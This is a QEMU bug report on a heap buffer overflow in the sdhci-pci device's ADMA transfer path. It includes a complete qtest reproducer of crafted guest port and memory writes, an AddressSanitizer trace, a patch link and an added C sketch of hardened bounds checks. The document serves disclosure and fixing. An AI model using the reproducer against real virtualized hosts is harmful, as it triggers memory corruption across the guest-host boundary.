Heap-overflow in flatview_read through sdhci_data_transfer
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
QEMU | Fix Released | Undecided | Unassigned |
Bug Description
Hello,
Reproducer:
cat << EOF | ./qemu-system-i386 -nodefaults \
-device sdhci-pci,
-device sd-card,
-drive if=sd,index=
-nographic -qtest stdio -accel qtest
outl 0xcf8 0x80001010
outl 0xcfc 0xd7055dba
outl 0xcf8 0x80001003
outl 0xcfc 0x86b1d733
writeq 0xd7055d2b 0x84126e0ed7d7355e
writeq 0xd7055d23 0x13bd7d7346e0129
writeq 0xd7055d05 0x615bfb845e05c42c
write 0x0 0x1 0x39
write 0x5 0x1 0x06
write 0x6 0x1 0x35
write 0x7 0x1 0x01
write 0x1350600 0x1 0x39
writew 0xd7055d0e 0x846e
write 0x1350600 0x1 0x29
write 0x1350602 0x1 0x1a
write 0x1350608 0x1 0x39
clock_step
writeq 0xd7055d03 0x6d00000026000000
clock_step
EOF
The trace:
[R +0.077745] outl 0xcf8 0x80001010
OK
[S +0.077773] OK
[R +0.077792] outl 0xcfc 0xd7055dba
OK
[S +0.077813] OK
[R +0.077826] outl 0xcf8 0x80001003
OK
[S +0.077835] OK
[R +0.077846] outl 0xcfc 0x86b1d733
OK
[S +0.080186] OK
[R +0.080204] writeq 0xd7055d2b 0x84126e0ed7d7355e
OK
[S +0.080255] OK
[R +0.080267] writeq 0xd7055d23 0x13bd7d7346e0129
OK
[S +0.080303] OK
[R +0.080316] writeq 0xd7055d05 0x615bfb845e05c42c
OK
[S +0.080350] OK
[R +0.080362] write 0x0 0x1 0x39
OK
[S +0.080606] OK
[R +0.080617] write 0x5 0x1 0x06
OK
[S +0.080629] OK
[R +0.080639] write 0x6 0x1 0x35
OK
[S +0.080648] OK
[R +0.080657] write 0x7 0x1 0x01
OK
[S +0.080665] OK
[R +0.080675] write 0x1350600 0x1 0x39
OK
[S +0.080863] OK
[R +0.080875] writew 0xd7055d0e 0x846e
OK
[S +0.080979] OK
[R +0.080991] write 0x1350600 0x1 0x29
OK
[S +0.081001] OK
[R +0.081011] write 0x1350602 0x1 0x1a
OK
[S +0.081019] OK
[R +0.081029] write 0x1350608 0x1 0x39
OK
[S +0.081037] OK
[R +0.081045] clock_step
OK 100
[S +0.081112] OK 100
[R +0.081126] writeq 0xd7055d03 0x6d00000026000000
OK
[S +0.081162] OK
[R +0.081171] clock_step
=======
==752161==ERROR: AddressSanitizer: heap-buffer-
WRITE of size 786432 at 0x61500001e500 thread T0
#0 0x5651bce1a93f in __asan_memcpy (/home/
#1 0x5651bf4197ce in flatview_
#2 0x5651bf41bff3 in flatview_read /home/alxndr/
#3 0x5651bf41bb48 in address_
#4 0x5651bf41cce8 in address_space_rw /home/alxndr/
#5 0x5651bd623b67 in dma_memory_
#6 0x5651bd623585 in dma_memory_rw /home/alxndr/
#7 0x5651bd6227b7 in dma_memory_read /home/alxndr/
#8 0x5651bd61b052 in sdhci_do_adma /home/alxndr/
#9 0x5651bd60d3c4 in sdhci_data_transfer /home/alxndr/
#10 0x5651c0c4d917 in timerlist_
#11 0x5651c0c4de51 in qemu_clock_
#12 0x5651bf562a13 in qtest_clock_warp /home/alxndr/
#13 0x5651bf74f5d8 in qtest_process_
#14 0x5651bf73d63e in qtest_process_inbuf /home/alxndr/
#15 0x5651bf73c3e3 in qtest_read /home/alxndr/
#16 0x5651c0842762 in qemu_chr_
#17 0x5651c08428aa in qemu_chr_be_write /home/alxndr/
#18 0x5651c0868514 in fd_chr_read /home/alxndr/
#19 0x5651c0754736 in qio_channel_
#20 0x7fac88fad4cd in g_main_
#21 0x5651c0cdfc67 in glib_pollfds_poll /home/alxndr/
#22 0x5651c0cdd567 in os_host_
#23 0x5651c0cdcf47 in main_loop_wait /home/alxndr/
#24 0x5651bf4bb08d in qemu_main_loop /home/alxndr/
#25 0x5651bce4d51c in main /home/alxndr/
#26 0x7fac887b6cc9 in __libc_start_main csu/../
#27 0x5651bcda2cf9 in _start (/home/
0x61500001e500 is located 0 bytes to the right of 512-byte region [0x61500001e300
allocated by thread T0 here:
#0 0x5651bce1b5b2 in calloc (/home/
#1 0x7fac88fb3210 in g_malloc0 (/usr/lib/
#2 0x5651bd8cd222 in sdhci_pci_realize /home/alxndr/
#3 0x5651bd88c228 in pci_qdev_realize /home/alxndr/
#4 0x5651c07a4ec9 in device_set_realized /home/alxndr/
#5 0x5651bfe384b8 in property_set_bool /home/alxndr/
#6 0x5651bfe2c1cf in object_property_set /home/alxndr/
#7 0x5651bfe49471 in object_
#8 0x5651bfe2d890 in object_
#9 0x5651c078cc64 in qdev_realize /home/alxndr/
#10 0x5651bd8bd8cc in qdev_device_add /home/alxndr/
#11 0x5651bf4e3e43 in device_init_func /home/alxndr/
#12 0x5651c0af71e4 in qemu_opts_foreach /home/alxndr/
#13 0x5651bf4cd04b in qemu_init /home/alxndr/
#14 0x5651bce4d517 in main /home/alxndr/
#15 0x7fac887b6cc9 in __libc_start_main csu/../
SUMMARY: AddressSanitizer: heap-buffer-
==752161==ABORTING
-Alex
Proposed patch -> https://lists.nongnu.org/archive/html/qemu-devel/2020-08/msg07968.html
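The report above shows a 786432-byte DMA read landing in a 512-byte buffer that was allocated at realize time. As an added, constructed illustration (not QEMU's sdhci code, and not a claim about this bug's exact root cause), the C below models a descriptor-driven DMA copy into a fixed device FIFO and shows the checks a device model needs before a guest-controlled length reaches memcpy; the guest memory array, the descriptor layout, and all sizes other than the 512-byte FIFO are assumptions.

```c
#include <stdint.h>
#include <string.h>
#define FIFO_SIZE 512u   /* same size as the overrun 512-byte region in the report */
typedef struct {
    uint32_t addr;    /* "guest" address: offset into a constructed guest buffer */
    uint16_t length;  /* ADMA2-style: 0 encodes 65536 */
} Descr;
typedef struct {
    uint8_t  fifo[FIFO_SIZE];
    uint32_t block_size;  /* guest-programmable; must never exceed the fifo */
    uint32_t data_count;  /* bytes of the current block already in the fifo */
} Dev;
/* Naive remaining-space arithmetic: once the guest can drive block_size below
 * data_count, this unsigned subtraction wraps to a huge memcpy length. */
static uint32_t naive_remaining(uint32_t block_size, uint32_t data_count)
{
    return block_size - data_count;
}
/* Hardened copy (stands in for dma_memory_read): every guest-controlled value
 * is validated before it becomes a memcpy bound. Returns bytes copied, or -1
 * when the request is refused (a real model would also flag a DMA error). */
static long adma_copy_block(Dev *s, const Descr *d, const uint8_t *guest, size_t guest_len)
{
    uint32_t length = d->length ? d->length : 65536u;
    if (s->block_size == 0 || s->block_size > FIFO_SIZE) return -1;
    if (s->data_count > s->block_size) return -1;   /* state no longer consistent */
    uint32_t room = s->block_size - s->data_count;  /* cannot wrap after the checks */
    if (length > room) length = room;
    if (d->addr > guest_len || length > guest_len - d->addr) return -1;
    memcpy(&s->fifo[s->data_count], guest + d->addr, length);
    s->data_count += length;
    return (long)length;
}
/* Constructed scenario: fill one 512-byte block, then present descriptors
 * again after the guest reprogrammed block_size mid-transfer. */
static int demo(void)
{
    static uint8_t guest[4096];
    Dev s = { .block_size = 512, .data_count = 0 };
    Descr d1 = { .addr = 0, .length = 300 };
    Descr d2 = { .addr = 300, .length = 0 };   /* asks for 65536, clamped to 212 */
    if (adma_copy_block(&s, &d1, guest, sizeof guest) != 300) return 1;
    if (adma_copy_block(&s, &d2, guest, sizeof guest) != 212) return 2;
    s.block_size = 100; s.data_count = 300;    /* shrunk below the bytes already queued */
    if (adma_copy_block(&s, &d1, guest, sizeof guest) != -1) return 3;
    s.block_size = 4096; s.data_count = 0;     /* larger than the fifo itself */
    if (adma_copy_block(&s, &d1, guest, sizeof guest) != -1) return 4;
    return 0;                                  /* every unsafe request was refused */
}
```

The point of the model is that block_size and data_count are both guest-influenced, so the remaining-space subtraction is only safe after their relationship has been checked on every DMA step, not just at command start.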